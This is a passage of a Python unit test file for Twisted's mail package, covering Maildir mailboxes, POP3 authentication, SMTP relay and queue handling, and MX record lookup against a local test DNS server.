d.addCallback(self._append, mbox)
d.addCallback(self._setState, mbox, open=True)
return d
class MaildirAppendFileTestCase(unittest.TestCase, _AppendTestMixin):
"""
Tests for L{MaildirMailbox.appendMessage} when invoked with a C{str}.
"""
def setUp(self):
self.d = self.mktemp()
mail.maildir.initializeMaildir(self.d)
def test_append(self):
"""
L{MaildirMailbox.appendMessage} returns a L{Deferred} which fires when
the message has been added to the end of the mailbox.
"""
mbox = mail.maildir.MaildirMailbox(self.d)
messages = []
for i in xrange(1, 11):
temp = tempfile.TemporaryFile()
temp.write("X" * i)
temp.seek(0, 0)
messages.append(temp)
self.addCleanup(temp.close)
d = self._appendMessages(mbox, messages)
d.addCallback(self._cbTestAppend, mbox)
return d
def _cbTestAppend(self, result, mbox):
"""
Check that the mailbox has the expected number (ten) of messages in it,
and that each has the expected contents, and that they are in the same
order as that in which they were appended.
"""
self.assertEqual(len(mbox.listMessages()), 10)
self.assertEqual(
[len(mbox.getMessage(i).read()) for i in range(10)],
range(1, 11))
class MaildirTestCase(unittest.TestCase):
def setUp(self):
self.d = self.mktemp()
mail.maildir.initializeMaildir(self.d)
def tearDown(self):
shutil.rmtree(self.d)
def testInitializer(self):
d = self.d
trash = os.path.join(d, '.Trash')
self.failUnless(os.path.exists(d) and os.path.isdir(d))
self.failUnless(os.path.exists(os.path.join(d, 'new')))
self.failUnless(os.path.exists(os.path.join(d, 'cur')))
self.failUnless(os.path.exists(os.path.join(d, 'tmp')))
self.failUnless(os.path.isdir(os.path.join(d, 'new')))
self.failUnless(os.path.isdir(os.path.join(d, 'cur')))
self.failUnless(os.path.isdir(os.path.join(d, 'tmp')))
self.failUnless(os.path.exists(os.path.join(trash, 'new')))
self.failUnless(os.path.exists(os.path.join(trash, 'cur')))
self.failUnless(os.path.exists(os.path.join(trash, 'tmp')))
self.failUnless(os.path.isdir(os.path.join(trash, 'new')))
self.failUnless(os.path.isdir(os.path.join(trash, 'cur')))
self.failUnless(os.path.isdir(os.path.join(trash, 'tmp')))
def test_nameGenerator(self):
"""
Each call to L{_MaildirNameGenerator.generate} returns a unique
string suitable for use as the basename of a new message file. The
names are ordered such that those generated earlier sort less than
those generated later.
"""
clock = task.Clock()
clock.advance(0.05)
generator = mail.maildir._MaildirNameGenerator(clock)
firstName = generator.generate()
clock.advance(0.05)
secondName = generator.generate()
self.assertTrue(firstName < secondName)
def test_mailbox(self):
"""
Exercise the methods of L{IMailbox} as implemented by
L{MaildirMailbox}.
"""
j = os.path.join
n = mail.maildir._generateMaildirName
msgs = [j(b, n()) for b in ('cur', 'new') for x in range(5)]
# Toss a few files into the mailbox
i = 1
for f in msgs:
fObj = file(j(self.d, f), 'w')
fObj.write('x' * i)
fObj.close()
i = i + 1
mb = mail.maildir.MaildirMailbox(self.d)
self.assertEqual(mb.listMessages(), range(1, 11))
self.assertEqual(mb.listMessages(1), 2)
self.assertEqual(mb.listMessages(5), 6)
self.assertEqual(mb.getMessage(6).read(), 'x' * 7)
self.assertEqual(mb.getMessage(1).read(), 'x' * 2)
d = {}
for i in range(10):
u = mb.getUidl(i)
self.failIf(u in d)
d[u] = None
p, f = os.path.split(msgs[5])
mb.deleteMessage(5)
self.assertEqual(mb.listMessages(5), 0)
self.failUnless(os.path.exists(j(self.d, '.Trash', 'cur', f)))
self.failIf(os.path.exists(j(self.d, msgs[5])))
mb.undeleteMessages()
self.assertEqual(mb.listMessages(5), 6)
self.failIf(os.path.exists(j(self.d, '.Trash', 'cur', f)))
self.failUnless(os.path.exists(j(self.d, msgs[5])))
class AbstractMaildirDomainTestCase(unittest.TestCase):
"""
Tests for L{twisted.mail.maildir.AbstractMaildirDomain}.
"""
def test_interface(self):
"""
L{maildir.AbstractMaildirDomain} implements L{mail.IAliasableDomain}.
"""
verifyClass(mail.mail.IAliasableDomain,
mail.maildir.AbstractMaildirDomain)
class MaildirDirdbmDomainTestCase(unittest.TestCase):
"""
Tests for L{MaildirDirdbmDomain}.
"""
def setUp(self):
"""
Create a temporary L{MaildirDirdbmDomain} and parent
L{MailService} before running each test.
"""
self.P = self.mktemp()
self.S = mail.mail.MailService()
self.D = mail.maildir.MaildirDirdbmDomain(self.S, self.P)
def tearDown(self):
"""
Remove the temporary C{maildir} directory when the test has
finished.
"""
shutil.rmtree(self.P)
def test_addUser(self):
"""
L{MaildirDirdbmDomain.addUser} accepts a user and password
argument. It stores those in a C{dbm} dictionary
attribute and creates a directory for each user.
"""
toAdd = (('user1', 'pwd1'), ('user2', 'pwd2'), ('user3', 'pwd3'))
for (u, p) in toAdd:
self.D.addUser(u, p)
for (u, p) in toAdd:
self.failUnless(u in self.D.dbm)
self.assertEqual(self.D.dbm[u], p)
self.failUnless(os.path.exists(os.path.join(self.P, u)))
def test_credentials(self):
"""
L{MaildirDirdbmDomain.getCredentialsCheckers} initializes and
returns one L{ICredentialsChecker} checker by default.
"""
creds = self.D.getCredentialsCheckers()
self.assertEqual(len(creds), 1)
self.failUnless(cred.checkers.ICredentialsChecker.providedBy(creds[0]))
self.failUnless(cred.credentials.IUsernamePassword in creds[0].credentialInterfaces)
def test_requestAvatar(self):
"""
L{MaildirDirdbmDomain.requestAvatar} raises L{NotImplementedError}
unless it is supplied with an L{pop3.IMailbox} interface.
When called with an L{pop3.IMailbox}, it returns a 3-tuple
containing L{pop3.IMailbox}, an implementation of that interface
and a NOOP callable.
"""
class ISomething(Interface):
pass
self.D.addUser('user', 'password')
self.assertRaises(
NotImplementedError,
self.D.requestAvatar, 'user', None, ISomething
)
t = self.D.requestAvatar('user', None, pop3.IMailbox)
self.assertEqual(len(t), 3)
self.failUnless(t[0] is pop3.IMailbox)
self.failUnless(pop3.IMailbox.providedBy(t[1]))
t[2]()
def test_requestAvatarId(self):
"""
L{DirdbmDatabase.requestAvatarId} raises L{UnauthorizedLogin} if
supplied with invalid user credentials.
When called with valid credentials, L{requestAvatarId} returns
the username associated with the supplied credentials.
"""
self.D.addUser('user', 'password')
database = self.D.getCredentialsCheckers()[0]
creds = cred.credentials.UsernamePassword('user', 'wrong password')
self.assertRaises(
cred.error.UnauthorizedLogin,
database.requestAvatarId, creds
)
creds = cred.credentials.UsernamePassword('user', 'password')
self.assertEqual(database.requestAvatarId(creds), 'user')
def test_userDirectory(self):
"""
L{MaildirDirdbmDomain.userDirectory} is supplied with a user name
and returns the path to that user's maildir subdirectory.
Calling L{MaildirDirdbmDomain.userDirectory} with a
non-existent user returns the 'postmaster' directory if there
is a postmaster or returns L{None} if there is no postmaster.
"""
self.D.addUser('user', 'password')
self.assertEqual(self.D.userDirectory('user'),
os.path.join(self.D.root, 'user'))
self.D.postmaster = False
self.assertIdentical(self.D.userDirectory('nouser'), None)
self.D.postmaster = True
self.assertEqual(self.D.userDirectory('nouser'),
os.path.join(self.D.root, 'postmaster'))
class StubAliasableDomain(object):
"""
Minimal testable implementation of IAliasableDomain.
"""
implements(mail.mail.IAliasableDomain)
def exists(self, user):
"""
No test coverage for invocations of this method on domain objects,
so we just won't implement it.
"""
raise NotImplementedError()
def addUser(self, user, password):
"""
No test coverage for invocations of this method on domain objects,
so we just won't implement it.
"""
raise NotImplementedError()
def getCredentialsCheckers(self):
"""
This needs to succeed in order for other tests to complete
successfully, but we don't actually assert anything about its
behavior. Return an empty list. Sometime later we should return
something else and assert that a portal got set up properly.
"""
return []
def setAliasGroup(self, aliases):
"""
Just record the value so the test can check it later.
"""
self.aliasGroup = aliases
class ServiceDomainTestCase(unittest.TestCase):
def setUp(self):
self.S = mail.mail.MailService()
self.D = mail.protocols.DomainDeliveryBase(self.S, None)
self.D.service = self.S
self.D.protocolName = 'TEST'
self.D.host = 'hostname'
self.tmpdir = self.mktemp()
domain = mail.maildir.MaildirDirdbmDomain(self.S, self.tmpdir)
domain.addUser('user', 'password')
self.S.addDomain('test.domain', domain)
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testAddAliasableDomain(self):
"""
Test that adding an IAliasableDomain to a mail service properly sets
up alias group references and such.
"""
aliases = object()
domain = StubAliasableDomain()
self.S.aliases = aliases
self.S.addDomain('example.com', domain)
self.assertIdentical(domain.aliasGroup, aliases)
def testReceivedHeader(self):
hdr = self.D.receivedHeader(
('remotehost', '123.232.101.234'),
smtp.Address('<someguy@somplace>'),
['[email protected]']
)
fp = StringIO.StringIO(hdr)
m = rfc822.Message(fp)
self.assertEqual(len(m.items()), 1)
self.assertIn('Received', m)
def testValidateTo(self):
user = smtp.User('[email protected]', 'helo', None, 'wherever@whatever')
return defer.maybeDeferred(self.D.validateTo, user
).addCallback(self._cbValidateTo
)
def _cbValidateTo(self, result):
self.failUnless(callable(result))
def testValidateToBadUsername(self):
user = smtp.User('[email protected]', 'helo', None, 'wherever@whatever')
return self.assertFailure(
defer.maybeDeferred(self.D.validateTo, user),
smtp.SMTPBadRcpt)
def testValidateToBadDomain(self):
user = smtp.User('[email protected]', 'helo', None, 'wherever@whatever')
return self.assertFailure(
defer.maybeDeferred(self.D.validateTo, user),
smtp.SMTPBadRcpt)
def testValidateFrom(self):
helo = ('hostname', '127.0.0.1')
origin = smtp.Address('<user@hostname>')
self.failUnless(self.D.validateFrom(helo, origin) is origin)
helo = ('hostname', '1.2.3.4')
origin = smtp.Address('<user@hostname>')
self.failUnless(self.D.validateFrom(helo, origin) is origin)
helo = ('hostname', '1.2.3.4')
origin = smtp.Address('<>')
self.failUnless(self.D.validateFrom(helo, origin) is origin)
self.assertRaises(
smtp.SMTPBadSender,
self.D.validateFrom, None, origin
)
class VirtualPOP3TestCase(unittest.TestCase):
def setUp(self):
self.tmpdir = self.mktemp()
self.S = mail.mail.MailService()
self.D = mail.maildir.MaildirDirdbmDomain(self.S, self.tmpdir)
self.D.addUser('user', 'password')
self.S.addDomain('test.domain', self.D)
portal = cred.portal.Portal(self.D)
map(portal.registerChecker, self.D.getCredentialsCheckers())
self.S.portals[''] = self.S.portals['test.domain'] = portal
self.P = mail.protocols.VirtualPOP3()
self.P.service = self.S
self.P.magic = '<unit test magic>'
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testAuthenticateAPOP(self):
resp = md5(self.P.magic + 'password').hexdigest()
return self.P.authenticateUserAPOP('user', resp
).addCallback(self._cbAuthenticateAPOP
)
def _cbAuthenticateAPOP(self, result):
self.assertEqual(len(result), 3)
self.assertEqual(result[0], pop3.IMailbox)
self.failUnless(pop3.IMailbox.providedBy(result[1]))
result[2]()
def testAuthenticateIncorrectUserAPOP(self):
resp = md5(self.P.magic + 'password').hexdigest()
return self.assertFailure(
self.P.authenticateUserAPOP('resu', resp),
cred.error.UnauthorizedLogin)
def testAuthenticateIncorrectResponseAPOP(self):
resp = md5('wrong digest').hexdigest()
return self.assertFailure(
self.P.authenticateUserAPOP('user', resp),
cred.error.UnauthorizedLogin)
def testAuthenticatePASS(self):
return self.P.authenticateUserPASS('user', 'password'
).addCallback(self._cbAuthenticatePASS
)
def _cbAuthenticatePASS(self, result):
self.assertEqual(len(result), 3)
self.assertEqual(result[0], pop3.IMailbox)
self.failUnless(pop3.IMailbox.providedBy(result[1]))
result[2]()
def testAuthenticateBadUserPASS(self):
return self.assertFailure(
self.P.authenticateUserPASS('resu', 'password'),
cred.error.UnauthorizedLogin)
def testAuthenticateBadPasswordPASS(self):
return self.assertFailure(
self.P.authenticateUserPASS('user', 'wrong password'),
cred.error.UnauthorizedLogin)
class empty(smtp.User):
def __init__(self):
pass
class RelayTestCase(unittest.TestCase):
def testExists(self):
service = mail.mail.MailService()
domain = mail.relay.DomainQueuer(service)
doRelay = [
address.UNIXAddress('/var/run/mail-relay'),
address.IPv4Address('TCP', '127.0.0.1', 12345),
]
dontRelay = [
address.IPv4Address('TCP', '192.168.2.1', 62),
address.IPv4Address('TCP', '1.2.3.4', 1943),
]
for peer in doRelay:
user = empty()
user.orig = 'user@host'
user.dest = 'tsoh@resu'
user.protocol = empty()
user.protocol.transport = empty()
user.protocol.transport.getPeer = lambda: peer
self.failUnless(callable(domain.exists(user)))
for peer in dontRelay:
user = empty()
user.orig = 'some@place'
user.protocol = empty()
user.protocol.transport = empty()
user.protocol.transport.getPeer = lambda: peer
user.dest = 'who@cares'
self.assertRaises(smtp.SMTPBadRcpt, domain.exists, user)
class RelayerTestCase(unittest.TestCase):
def setUp(self):
self.tmpdir = self.mktemp()
os.mkdir(self.tmpdir)
self.messageFiles = []
for i in range(10):
name = os.path.join(self.tmpdir, 'body-%d' % (i,))
f = file(name + '-H', 'w')
pickle.dump(['from-%d' % (i,), 'to-%d' % (i,)], f)
f.close()
f = file(name + '-D', 'w')
f.write(name)
f.seek(0, 0)
self.messageFiles.append(name)
self.R = mail.relay.RelayerMixin()
self.R.loadMessages(self.messageFiles)
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testMailFrom(self):
for i in range(10):
self.assertEqual(self.R.getMailFrom(), 'from-%d' % (i,))
self.R.sentMail(250, None, None, None, None)
self.assertEqual(self.R.getMailFrom(), None)
def testMailTo(self):
for i in range(10):
self.assertEqual(self.R.getMailTo(), ['to-%d' % (i,)])
self.R.sentMail(250, None, None, None, None)
self.assertEqual(self.R.getMailTo(), None)
def testMailData(self):
for i in range(10):
name = os.path.join(self.tmpdir, 'body-%d' % (i,))
self.assertEqual(self.R.getMailData().read(), name)
self.R.sentMail(250, None, None, None, None)
self.assertEqual(self.R.getMailData(), None)
class Manager:
def __init__(self):
self.success = []
self.failure = []
self.done = []
def notifySuccess(self, factory, message):
self.success.append((factory, message))
def notifyFailure(self, factory, message):
self.failure.append((factory, message))
def notifyDone(self, factory):
self.done.append(factory)
class ManagedRelayerTestCase(unittest.TestCase):
def setUp(self):
self.manager = Manager()
self.messages = range(0, 20, 2)
self.factory = object()
self.relay = mail.relaymanager.ManagedRelayerMixin(self.manager)
self.relay.messages = self.messages[:]
self.relay.names = self.messages[:]
self.relay.factory = self.factory
def testSuccessfulSentMail(self):
for i in self.messages:
self.relay.sentMail(250, None, None, None, None)
self.assertEqual(
self.manager.success,
[(self.factory, m) for m in self.messages]
)
def testFailedSentMail(self):
for i in self.messages:
self.relay.sentMail(550, None, None, None, None)
self.assertEqual(
self.manager.failure,
[(self.factory, m) for m in self.messages]
)
def testConnectionLost(self):
self.relay.connectionLost(failure.Failure(Exception()))
self.assertEqual(self.manager.done, [self.factory])
class DirectoryQueueTestCase(unittest.TestCase):
def setUp(self):
# This is almost a test case itself.
self.tmpdir = self.mktemp()
os.mkdir(self.tmpdir)
self.queue = mail.relaymanager.Queue(self.tmpdir)
self.queue.noisy = False
for m in range(25):
hdrF, msgF = self.queue.createNewMessage()
pickle.dump(['header', m], hdrF)
hdrF.close()
msgF.lineReceived('body: %d' % (m,))
msgF.eomReceived()
self.queue.readDirectory()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testWaiting(self):
self.failUnless(self.queue.hasWaiting())
self.assertEqual(len(self.queue.getWaiting()), 25)
waiting = self.queue.getWaiting()
self.queue.setRelaying(waiting[0])
self.assertEqual(len(self.queue.getWaiting()), 24)
self.queue.setWaiting(waiting[0])
self.assertEqual(len(self.queue.getWaiting()), 25)
def testRelaying(self):
for m in self.queue.getWaiting():
self.queue.setRelaying(m)
self.assertEqual(
len(self.queue.getRelayed()),
25 - len(self.queue.getWaiting())
)
self.failIf(self.queue.hasWaiting())
relayed = self.queue.getRelayed()
self.queue.setWaiting(relayed[0])
self.assertEqual(len(self.queue.getWaiting()), 1)
self.assertEqual(len(self.queue.getRelayed()), 24)
def testDone(self):
msg = self.queue.getWaiting()[0]
self.queue.setRelaying(msg)
self.queue.done(msg)
self.assertEqual(len(self.queue.getWaiting()), 24)
self.assertEqual(len(self.queue.getRelayed()), 0)
self.failIf(msg in self.queue.getWaiting())
self.failIf(msg in self.queue.getRelayed())
def testEnvelope(self):
envelopes = []
for msg in self.queue.getWaiting():
envelopes.append(self.queue.getEnvelope(msg))
envelopes.sort()
for i in range(25):
self.assertEqual(
envelopes.pop(0),
['header', i]
)
from twisted.names import server
from twisted.names import client
from twisted.names import common
class TestAuthority(common.ResolverBase):
def __init__(self):
common.ResolverBase.__init__(self)
self.addresses = {}
def _lookup(self, name, cls, type, timeout = None):
if name in self.addresses and type == dns.MX:
results = []
for a in self.addresses[name]:
hdr = dns.RRHeader(
name, dns.MX, dns.IN, 60, dns.Record_MX(0, a)
)
results.append(hdr)
return defer.succeed((results, [], []))
return defer.fail(failure.Failure(dns.DomainError(name)))
def setUpDNS(self):
self.auth = TestAuthority()
factory = server.DNSServerFactory([self.auth])
protocol = dns.DNSDatagramProtocol(factory)
while 1:
self.port = reactor.listenTCP(0, factory, interface='127.0.0.1')
portNumber = self.port.getHost().port
try:
self.udpPort = reactor.listenUDP(portNumber, protocol, interface='127.0.0.1')
except CannotListenError:
self.port.stopListening()
else:
break
self.resolver = client.Resolver(servers=[('127.0.0.1', portNumber)])
def tearDownDNS(self):
dl = []
dl.append(defer.maybeDeferred(self.port.stopListening))
dl.append(defer.maybeDeferred(self.udpPort.stopListening))
try:
self.resolver._parseCall.cancel()
except:
pass
return defer.DeferredList(dl)
class MXTestCase(unittest.TestCase):
"""
Tests for L{mail.relaymanager.MXCalculator}.
"""
def setUp(self):
setUpDNS(self)
self.clock = task.Clock()
self.mx = mail.relaymanager.MXCalculator(self.resolver, self.clock)
def tearDown(self):
return tearDownDNS(self)
def test_defaultClock(self):
"""
L{MXCalculator}'s default clock is C{twisted.internet.reactor}.
"""
self.assertIdentical(
mail.relaymanager.MXCalculator(self.resolver).clock,
reactor)
def testSimpleSuccess(self):
self.auth.addresses['test.domain'] = ['the.email.test.domain']
return self.mx.getMX('test.domain').addCallback(self._cbSimpleSuccess)
def _cbSimpleSuccess(self, mx):
self.assertEqual(mx.preference, 0)
self.assertEqual(str(mx.name), 'the.email.test.domain')
def testSimpleFailure(self):
self.mx.fallbackToDomain = False
return self.assertFailure(self.mx.getMX('test.domain'), IOError)
def testSimpleFailureWithFallback(self):
return self.assertFailure(self.mx.getMX('test.domain'), DNSLookupError)
def _exchangeTest(self, domain, records, correctMailExchange):
"""
Issue an MX request for the given domain and arrange for it to be
responded to with the given records. Verify that the resulting mail
exchange is the indicated host.
@type domain: C{str}
@type records: C{list} of L{RRHeader}
@type correctMailExchange: C{str}
@rtype: L{Deferred}
"""
class DummyResolver(object):
def lookupMailExchange(self, name):
if name == domain:
return defer.succeed((
records,
[],
[]))
return defer.fail(DNSNameError(domain))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(domain)
def gotMailExchange(record):
self.assertEqual(str(record.name), correctMailExchange)
d.addCallback(gotMailExchange)
return d
def test_mailExchangePreference(self):
"""
The MX record with the lowest preference is returned by
L{MXCalculator.getMX}.
"""
domain = "example.com"
good = "good.example.com"
bad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, bad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, good)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(2, bad))]
return self._exchangeTest(domain, records, good)
def test_badExchangeExcluded(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
which is not also marked as bad.
"""
domain = "example.com"
good = "good.example.com"
bad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, bad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, good))]
self.mx.markBad(bad)
return self._exchangeTest(domain, records, good)
def test_fallbackForAllBadExchanges(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
if all the MX records in the response have been marked bad.
"""
domain = "example.com"
bad = "bad.example.com"
worse = "worse.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, bad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, worse))]
self.mx.markBad(bad)
self.mx.markBad(worse)
return self._exchangeTest(domain, records, bad)
def test_badExchangeExpires(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
if it was last marked bad longer than L{MXCalculator.timeOutBadMX}
seconds ago.
"""
domain = "example.com"
good = "good.example.com"
previouslyBad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, previouslyBad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, good))]
self.mx.markBad(previouslyBad)
self.clock.advance(self.mx.timeOutBadMX)
return self._exchangeTest(domain, records, previouslyBad)
def test_goodExchangeUsed(self):
"""
L{MXCalculator.getMX} returns the MX record with the lowest preference
if it was marked good after it was marked bad.
"""
domain = "example.com"
good = "good.example.com"
previouslyBad = "bad.example.com"
records = [
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, previouslyBad)),
RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(1, good))]
self.mx.markBad(previouslyBad)
self.mx.markGood(previouslyBad)
self.clock.advance(self.mx.timeOutBadMX)
return self._exchangeTest(domain, records, previouslyBad)
def test_successWithoutResults(self):
"""
If an MX lookup succeeds but the result set is empty,
L{MXCalculator.getMX} should try to look up an I{A} record for the
requested name and call back its returned Deferred with that
address.
"""
ip = '1.2.3.4'
domain = 'example.org'
class DummyResolver(object):
"""
Fake resolver which will respond to an MX lookup with an empty
result set.
@ivar mx: A dictionary mapping hostnames to three-tuples of
results to be returned from I{MX} lookups.
@ivar a: A dictionary mapping hostnames to addresses to be
returned from I{A} lookups.
"""
mx = {domain: ([], [], [])}
a = {domain: ip}
def lookupMailExchange(self, domain):
return defer.succeed(self.mx[domain])
def getHostByName(self, domain):
return defer.succeed(self.a[domain])
self.mx.resolver = DummyResolver()
d = self.mx.getMX(domain)
d.addCallback(self.assertEqual, Record_MX(name=ip))
return d
def test_failureWithSuccessfulFallback(self):
"""
Test that if the MX record lookup fails, fallback is enabled, and an A
record is available for the name, then the Deferred returned by
L{MXCalculator.getMX} ultimately fires with a Record_MX instance which
gives the address in the A record for the name.
"""
class DummyResolver(object):
"""
Fake resolver which will fail an MX lookup but then succeed a
getHostByName call.
"""
def lookupMailExchange(self, domain):
return defer.fail(DNSNameError())
def getHostByName(self, domain):
return defer.succeed("1.2.3.4")
self.mx.resolver = DummyResolver()
d = self.mx.getMX("domain")
d.addCallback(self.assertEqual, Record_MX(name="1.2.3.4"))
return d
def test_cnameWithoutGlueRecords(self):
"""
If an MX lookup returns a single CNAME record as a result, MXCalculator
will perform an MX lookup for the canonical name indicated and return
the MX record which results.
"""
alias = "alias.example.com"
canonical = "canonical.example.com"
exchange = "mail.example.com"
class DummyResolver(object):
"""
Fake resolver which will return a CNAME for an MX lookup of a name
which is an alias and an MX for an MX lookup of the canonical name.
"""
def lookupMailExchange(self, domain):
if domain == alias:
return defer.succeed((
[RRHeader(name=domain,
type=Record_CNAME.TYPE,
payload=Record_CNAME(canonical))],
[], []))
elif domain == canonical:
return defer.succeed((
[RRHeader(name=domain,
type=Record_MX.TYPE,
payload=Record_MX(0, exchange))],
[], []))
else:
return defer.fail(DNSNameError(domain))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(alias)
d.addCallback(self.assertEqual, Record_MX(name=exchange))
return d
def test_cnameChain(self):
"""
If L{MXCalculator.getMX} encounters a CNAME chain which is longer than
the length specified, the returned L{Deferred} should errback with
L{CanonicalNameChainTooLong}.
"""
class DummyResolver(object):
"""
Fake resolver which generates a CNAME chain of infinite length in
response to MX lookups.
"""
chainCounter = 0
def lookupMailExchange(self, domain):
self.chainCounter += 1
name = 'x-%d.example.com' % (self.chainCounter,)
return defer.succeed((
[RRHeader(name=domain,
type=Record_CNAME.TYPE,
payload=Record_CNAME(name))],
[], []))
cnameLimit = 3
self.mx.resolver = DummyResolver()
d = self.mx.getMX("mail.example.com", cnameLimit)
self.assertFailure(
d, twisted.mail.relaymanager.CanonicalNameChainTooLong)
def cbChainTooLong(error):
self.assertEqual(error.args[0], Record_CNAME("x-%d.example.com" % (cnameLimit + 1,)))
self.assertEqual(self.mx.resolver.chainCounter, cnameLimit + 1)
d.addCallback(cbChainTooLong)
return d
def test_cnameWithGlueRecords(self):
"""
If an MX lookup returns a CNAME and the MX record for the CNAME, the
L{Deferred} returned by L{MXCalculator.getMX} should be called back
with the name from the MX record without further lookups being
attempted.
"""
lookedUp = []
alias = "alias.example.com"
canonical = "canonical.example.com"
exchange = "mail.example.com"
class DummyResolver(object):
def lookupMailExchange(self, domain):
if domain != alias or lookedUp:
# Don't give back any results for anything except the alias
# or on any request after the first.
return ([], [], [])
return defer.succeed((
[RRHeader(name=alias,
type=Record_CNAME.TYPE,
payload=Record_CNAME(canonical)),
RRHeader(name=canonical,
type=Record_MX.TYPE,
payload=Record_MX(name=exchange))],
[], []))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(alias)
d.addCallback(self.assertEqual, Record_MX(name=exchange))
return d
def test_cnameLoopWithGlueRecords(self):
"""
If an MX lookup returns two CNAME records which point to each other,
the loop should be detected and the L{Deferred} returned by
L{MXCalculator.getMX} should be errbacked with L{CanonicalNameLoop}.
"""
firstAlias = "cname1.example.com"
secondAlias = "cname2.example.com"
class DummyResolver(object):
def lookupMailExchange(self, domain):
return defer.succeed((
[RRHeader(name=firstAlias,
type=Record_CNAME.TYPE,
payload=Record_CNAME(secondAlias)),
RRHeader(name=secondAlias,
type=Record_CNAME.TYPE,
payload=Record_CNAME(firstAlias))],
[], []))
self.mx.resolver = DummyResolver()
d = self.mx.getMX(firstAlias)
self.assertFailure(d, twisted.mail.relaymanager.CanonicalNameLoop)
return d
def testManyRecords(self):
self.auth.addresses['test.domain'] = [
'mx1.test.domain', 'mx2.test.domain', 'mx3.test.domain'
]
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsSuccessfulLookup
)
def _cbManyRecordsSuccessfulLookup(self, mx):
self.failUnless(str(mx.name).split('.', 1)[0] in ('mx1', 'mx2', 'mx3'))
self.mx.markBad(str(mx.name))
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsDifferentResult, mx
)
def _cbManyRecordsDifferentResult(self, nextMX, mx):
self.assertNotEqual(str(mx.name), str(nextMX.name))
self.mx.markBad(str(nextMX.name))
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsLastResult, mx, nextMX
)
def _cbManyRecordsLastResult(self, lastMX, mx, nextMX):
self.assertNotEqual(str(mx.name), str(lastMX.name))
self.assertNotEqual(str(nextMX.name), str(lastMX.name))
self.mx.markBad(str(lastMX.name))
self.mx.markGood(str(nextMX.name))
return self.mx.getMX('test.domain'
).addCallback(self._cbManyRecordsRepeatSpecificResult, nextMX
)
def _cbManyRecordsRepeatSpecificResult(self, againMX, nextMX):
self.assertEqual(str(againMX.name), str(nextMX.name))
class LiveFireExercise(unittest.TestCase):
if interfaces.IReactorUDP(reactor, None) is None:
skip = "UDP support is required to determining MX records"
def setUp(self):
setUpDNS(self)
self.tmpdirs = [
'domainDir', 'insertionDomain', 'insertionQueue',
'destinationDomain', 'destinationQueue'
]
def tearDown(self):
for d in self.tmpdirs:
if os.path.exists(d):
shutil.rmtree(d)
return tearDownDNS(self)
def testLocalDelivery(self):
service = mail.mail.MailService()
service.smtpPortal.registerChecker(cred.checkers.AllowAnonymousAccess())
domain = mail.maildir.MaildirDirdbmDomain(service, 'domainDir')
domain.addUser('user', 'password')
service.addDomain('test.domain', domain)
service.portals[''] = service.portals['test.domain']
map(service.portals[''].registerChecker, domain.getCredentialsCheckers())
service.setQueue(mail.relay.DomainQueuer(service))
manager = mail.relaymanager.SmartHostSMTPRelayingManager(service.queue, None)
helper = mail.relaymanager.RelayStateHelper(manager, 1)
f = service.getSMTPFactory()
self.smtpServer = reactor.listenTCP(0, f, interface='127.0.0.1')
client = LineSendingProtocol([
'HELO meson',
'MAIL FROM: <user@hostname>',
'RCPT TO: <[email protected]>',
'DATA',
'This is the message',
'.',
'QUIT'
])
done = Deferred()
f = protocol.ClientFactory()
f.protocol = lambda: client
f.clientConnectionLost = lambda *args: done.callback(None)
reactor.connectTCP('127.0.0.1', self.smtpServer.getHost().port, f)
def finished(ign):
mbox = domain.requestAvatar('user', None, pop3.IMailbox)[1]
msg = mbox.getMessage(0).read()
self.failIfEqual(msg.find('This is the message'), -1)
return self.smtpServer.stopListening()
done.addCallback(finished)
return done
def testRelayDelivery(self):
# Here is the service we will connect to and send mail from
insServ = mail.mail.MailService()
insServ.smtpPortal.registerChecker(cred.checkers.AllowAnonymousAccess())
domain = mail.maildir.MaildirDirdbmDomain(insServ, 'insertionDomain')
insServ.addDomain('insertion.domain', domain)
os.mkdir('insertionQueue')
insServ.setQueue(mail.relaymanager.Queue('insertionQueue'))
insServ.domains.setDefaultDomain(mail.relay.DomainQueuer(insServ))
manager = mail.relaymanager.SmartHostSMTPRelayingManager(insServ.queue)
manager.fArgs += ('test.identity.hostname',)
helper = mail.relaymanager.RelayStateHelper(manager, 1)
# Yoink! Now the internet obeys OUR every whim!
manager.mxcalc = mail.relaymanager.MXCalculator(self.resolver)
# And this is our whim.
self.auth.addresses['destination.domain'] = ['127.0.0.1']
f = insServ.getSMTPFactory()
self.insServer = reactor.listenTCP(0, f, interface='127.0.0.1')
# Here is the service the previous one will connect to for final
# delivery
destServ = mail.mail.MailService()
destServ.smtpPortal.registerChecker(cred.checkers.AllowAnonymousAccess())
domain = mail.maildir.MaildirDirdbmDomain(destServ, 'destinationDomain')
domain.addUser('user', 'password')
destServ.addDomain('destination.domain', domain)
os.mkdir('destinationQueue')
destServ.setQueue(mail.relaymanager.Queue('destinationQueue'))
manager2 = mail.relaymanager.SmartHostSMTPRelayingManager(destServ.queue)
helper = mail.relaymanager.RelayStateHelper(manager, 1)
helper.startService()
f = destServ.getSMTPFactory()
